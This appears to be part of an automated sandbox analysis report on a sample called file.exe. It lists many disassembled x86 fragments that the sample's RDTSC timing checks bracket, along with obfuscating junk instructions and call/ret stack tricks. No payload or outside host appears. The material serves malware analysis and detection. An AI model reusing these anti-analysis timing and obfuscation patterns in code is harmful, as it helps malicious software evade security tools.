              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A707DF second address: A7084E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FBF315524B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, 716FBFC6h 0x00000027 pushad 0x00000028 push edi 0x00000029 mov dword ptr [ebp+1244FEA4h], eax 0x0000002f pop edi 0x00000030 popad 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007FBF315524B8h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d push edi 0x0000004e pop edi 0x0000004f push 00000000h 0x00000051 cld 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jl 00007FBF315524B6h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F736 second address: A6F744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7084E second address: A70857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F744 second address: A6F748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A710F4 second address: A710F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7297C second address: A72986 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF3154D24Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A733ED second address: A73422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D2FCFh], ebx 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D2446h], edi 0x0000001a push 00000000h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e js 00007FBF315524B8h 0x00000024 push eax 0x00000025 pop eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push esi 0x0000002c pop esi 0x0000002d pop eax 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73137 second address: A7313D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7313D second address: A73142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73142 second address: A73148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78438 second address: A7847B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF315524C0h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov bx, cx 0x00000016 mov ebx, dword ptr [ebp+122D28C2h] 0x0000001c push 00000000h 0x0000001e jnp 00007FBF315524BCh 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+124557C0h], ecx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73148 second address: A7314C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7847B second address: A78480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78480 second address: A78486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78486 second address: A7848A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79398 second address: A793F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jnc 00007FBF3154D256h 0x00000011 nop 0x00000012 mov edi, 43C67596h 0x00000017 push 00000000h 0x00000019 or dword ptr [ebp+122D300Eh], eax 0x0000001f push 00000000h 0x00000021 mov bx, ax 0x00000024 xchg eax, esi 0x00000025 jng 00007FBF3154D25Bh 0x0000002b jmp 00007FBF3154D255h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007FBF3154D246h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A793F9 second address: A79403 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF315524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A27B second address: A7A286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B200 second address: A7B24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp], eax 0x0000000b adc di, B2EBh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FBF315524B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1D2Ch], eax 0x00000032 push 00000000h 0x00000034 mov bl, EAh 0x00000036 mov dword ptr [ebp+122D58BDh], eax 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B24A second address: A7B269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FBF3154D248h 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3154D24Dh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B372 second address: A7B376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C44A second address: A7C44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B376 second address: A7B37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D1F4 second address: A7D1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C44E second address: A7C454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B37C second address: A7B382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C454 second address: A7C524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBF315524C7h 0x0000000f nop 0x00000010 add dword ptr [ebp+122D23DAh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FBF315524B8h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e jmp 00007FBF315524C8h 0x00000043 or bx, 1FE5h 0x00000048 mov eax, dword ptr [ebp+122D0EA9h] 0x0000004e jmp 00007FBF315524BCh 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007FBF315524B8h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 0000001Ch 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f or ebx, dword ptr [ebp+122D2AAEh] 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 pushad 0x0000007a popad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D2AD second address: A7D2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C524 second address: A7C529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D43E second address: A7D444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D520 second address: A7D537 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF315524B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FBF315524B8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D537 second address: A7D53E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FFDB second address: A7FFF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBF315524BEh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FFF6 second address: A7FFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FFFC second address: A80000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80000 second address: A80004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80004 second address: A8005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FBF315524B8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push eax 0x00000024 mov edi, dword ptr [ebp+122D38FAh] 0x0000002a pop ebx 0x0000002b mov edi, dword ptr [ebp+122D2E9Ch] 0x00000031 push 00000000h 0x00000033 clc 0x00000034 and di, 326Dh 0x00000039 push 00000000h 0x0000003b mov edi, esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBF315524C9h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8005F second address: A80064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84066 second address: A8406D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8406D second address: A8407A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8407A second address: A8407E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8407E second address: A84082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84082 second address: A84092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FBF315524BAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84092 second address: A840A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3154D24Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8482C second address: A84832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84832 second address: A84838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84838 second address: A8483C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8676B second address: A8676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85807 second address: A8580C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A869C4 second address: A869D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FBF3154D248h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A869D5 second address: A869E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBF315524B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86A9E second address: A86AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86AA2 second address: A86AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89DFF second address: A89E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BE9B second address: A8BE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3475D second address: A34761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34761 second address: A34790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FBF315524CBh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9603F second address: A96049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96199 second address: A961F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jo 00007FBF315524C7h 0x00000011 jmp 00007FBF315524C1h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jnl 00007FBF315524CFh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A961F7 second address: A96201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A962CE second address: A962F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FBF315524B8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jng 00007FBF315524C2h 0x00000015 jnc 00007FBF315524BCh 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A962F7 second address: A96342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3154D250h 0x00000009 popad 0x0000000a jmp 00007FBF3154D24Ah 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 je 00007FBF3154D24Ch 0x00000019 je 00007FBF3154D246h 0x0000001f jmp 00007FBF3154D24Dh 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98BF3 second address: A98BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98BF7 second address: A98BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98BFB second address: A98C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FBF315524BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D607 second address: A9D60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D60B second address: A9D626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF315524C5h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9DBF3 second address: A9DC01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FBF3154D25Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9DC01 second address: A9DC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524C1h 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBF315524BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9DC20 second address: A9DC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9DC24 second address: A9DC32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 jl 00007FBF315524BEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E1D9 second address: A9E1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FBF3154D250h 0x0000000e push ecx 0x0000000f jbe 00007FBF3154D246h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E395 second address: A9E39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E39D second address: A9E3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E56C second address: A9E59E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF315524BAh 0x00000008 pushad 0x00000009 jmp 00007FBF315524C7h 0x0000000e jnc 00007FBF315524B6h 0x00000014 ja 00007FBF315524B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1CDE second address: AA1CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1CE2 second address: AA1CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA630E second address: AA6331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3154D252h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jo 00007FBF3154D24Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6331 second address: AA6338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA51DE second address: AA51ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FBF3154D24Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA51ED second address: AA51F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BCAB second address: A6BD0D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF3154D246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FBF3154D24Dh 0x00000014 pop eax 0x00000015 or dword ptr [ebp+122D1F31h], esi 0x0000001b call 00007FBF3154D249h 0x00000020 jmp 00007FBF3154D256h 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007FBF3154D256h 0x0000002c jo 00007FBF3154D24Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BE61 second address: A6BE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BE65 second address: A6BE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007FBF3154D254h 0x0000000e pushad 0x0000000f jc 00007FBF3154D246h 0x00000015 jp 00007FBF3154D246h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF3154D24Fh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BE94 second address: A6BE9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BF39 second address: A6BF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FBF3154D248h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
